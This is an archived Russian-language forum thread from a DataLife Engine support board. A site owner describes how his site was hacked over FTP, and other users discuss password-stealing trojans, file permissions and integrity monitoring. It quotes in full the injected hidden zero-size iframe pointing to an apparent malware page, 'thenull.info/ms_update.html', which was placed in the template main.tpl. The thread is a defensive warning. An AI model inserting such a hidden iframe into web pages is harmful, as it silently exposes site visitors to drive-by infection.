Перейти к публикации

Взломали сайт.

Danila

Автор: Danila,
в DataLife Engine (Общие вопросы)

Рекомендованные сообщения

Danila

Danila 8

Опубликовано:
Опубликовано:

Много раз об этом писалось, но хочу предупридить вас еще раз. 29 апреля взломали мой сайт psy-files.ru

Ломали по фтп, из Ханты-мансийска, вставили 

<iframe src="http://www.thenull.info/ms_update.html" width="0" height="0" style="display:none"></iframe>
Но, вставили его не в index.php (на аккаунте много доменов), а в файл main.tpl действующего шаблона (еще есть старые шаблоны) между строк 
</header> и {AJAX}

Обычно тупо вставляли в конце index-ого файла, а тут в шаблон, да еще и в самое начало... То есть похоже, что это было сделано целенаправленно против данного двига (люди знали куда вставлять).

Так что ставьте запрет на запись на main.tpl (для индекса я это уже сделал)

Ссылка на сообщение
Поделиться на других сайтах
celsoft

celsoft 6230

Опубликовано:
Опубликовано:

Ломали по фтп, из Ханты-мансийска, вставили

Тупо вставляет бот трояна, а если есть доступ по FTP и вставляет человек, то почему бы это не сделать грамотно в шаблон

Ссылка на сообщение
Поделиться на других сайтах
kolyma

kolyma 2

Опубликовано:
Опубликовано:

Danila,

да ни фига, DLE тут не причем, у меня также стыбрили пассы на ftp (или у хостера) и на все сайты повставляли, вне зависимости от CMS, вплоть до статичных html'ов

Ссылка на сообщение
Поделиться на других сайтах
Danila

Danila 8

Опубликовано:
Опубликовано: Автор

Ломали по фтп, из Ханты-мансийска, вставили

Тупо вставляет бот трояна, а если есть доступ по FTP и вставляет человек, то почему бы это не сделать грамотно в шаблон

Имеено человек и вставил это грамотно в середину шаблона main.tpl! А не как робот в конец index'ого файла.

Я не говорю, что здесь виноват ДЛЕ, я ж сказал, что ломали через FTP. Просто хочу обратить внимание коллег-юзеров ДЛЕ, что делалось это именно человеком и именно в шаблон и тот кто это делал был знаком с двигом ДЛЕ. Просто предупредил.

Ссылка на сообщение
Поделиться на других сайтах
Akela

Akela 9

Опубликовано:
Опубликовано:

Ломали по фтп, из Ханты-мансийска, вставили

Тупо вставляет бот трояна, а если есть доступ по FTP и вставляет человек, то почему бы это не сделать грамотно в шаблон

По поводу частых взломов у меня есть простая идея, которая в случае с ботами может сработать.

Скрытый текст
При наличии сделанного слепка всех файлов в кроне запускается периодическая проверка, скажем раз в 30 минут.

При наличии любого изменения тут же отсылается мейл админу.

Если же сайт взломан ручками, то конечно же взломщик и это сможет блокировать, но для этого нужны чуть продвинутые знания в движке.

Ссылка на сообщение
Поделиться на других сайтах
celsoft

celsoft 6230

Опубликовано:
Опубликовано:

По поводу частых взломов у меня есть простая идея, которая в случае с ботами может сработать.

а еще лучше не ловить троянов и поговорить с хостером чтобы провели проверку ПО а не просто отмахивались. Это в случае с ботом, уже очень давно выпущено описание это трояна, все антивирусы его знают, что что мешает проверить комп на вирусы и поставить все таки заплатки на Windows и IE, эти дырки давно закрыты.

Вот я почему за лицензионное ПО от Microsoft, все дырки закрываются гораздо раньше чем они приобретают массовый характер, а при лицензии поставил обновления на автомат и голова больше не болит.

Ссылка на сообщение
Поделиться на других сайтах
celsoft

celsoft 6230

Опубликовано:
Опубликовано:

а как вообще понять взломали ли у тя сайт?

если заходя а свой сайт у вас начинается грузится какая нибудь хрень, то значит ... либо как правило боты ставят код по шаблону в самое начало файла, тем самым нарушаются стандарты HTML и ваш сайт показывается в неожиданном виде, т.к. CSS уже не работает и т.д.

Ссылка на сообщение
Поделиться на других сайтах
Danila

Danila 8

Опубликовано:
Опубликовано: Автор

а еще лучше не ловить троянов и поговорить с хостером чтобы провели проверку ПО а не просто отмахивались.

А хостер тут причем? Если бы была дыра в ПО у хостера, то ломали бы не один-два сайта, а сразу серваками. У меня несколько аккаунтов, только в те вставили iframe на которые я заходил по ФТП с незащищенных (без антивируса) компьютеров. На те аккаунты куда я заходил только с компьютеров с антивирусами, таких проблем в виде вставленных скриптов и ifram'ов нет. Это просто обычный троян. У хостера стоит freebsd, не думаю, что проблема у него.

Ссылка на сообщение
Поделиться на других сайтах
celsoft

celsoft 6230

Опубликовано:
Опубликовано:

Если бы была дыра в ПО у хостера, то ломали бы не один-два сайта, а сразу серваками.

http://www.kaspersky.ru/news?id=207732424

:):)

Ссылка на сообщение
Поделиться на других сайтах
Danila

Danila 8

Опубликовано:
Опубликовано: Автор

Только freebsd не понимает вирусы написанные под винды, для нее это просто набор символов. По ссылке нигде не сказано, что были заражены сервера со freebsd.

Ссылка на сообщение
Поделиться на других сайтах
Danila

Danila 8

Опубликовано:
Опубликовано: Автор

Slash,

Ну по стандарту 644, можно поставить 444, только для четния, тоже самое и для index.php стоит зделать.

644 разрешает запись юзеру, если идет соед. по фтп от имени юзера, то запрет 644 не поможет. Нужен 444, но это поможет только от ботов. Любой чел, соед. по фтп от имени владельца файла спокойно сможет поменять 444 на 644 или любой другой.

Ссылка на сообщение
Поделиться на других сайтах
Kaiser

Kaiser 2

Опубликовано:
Опубликовано:

Danila,

Ну вообще-то меня конкретно спросили про chmod, а не про то, у кого есть пароли или нет, это уже другая тема.

Ссылка на сообщение
Поделиться на других сайтах
celsoft

celsoft 6230

Опубликовано:
Опубликовано:

Danila,

По вашему хостинг valuehost на Windows стоит, также на linux, Если вы считаете что вирусы есть только для windows то мне очень жаль, но я вас разочарую, для абсолютно любой OS существуют вирусы, вопрос только в том закрыты ли были уязвимости

Ссылка на сообщение
Поделиться на других сайтах

Архивировано

Эта тема находится в архиве и закрыта для публикации сообщений.

Перейти к списку тем
×
×
  • Создать...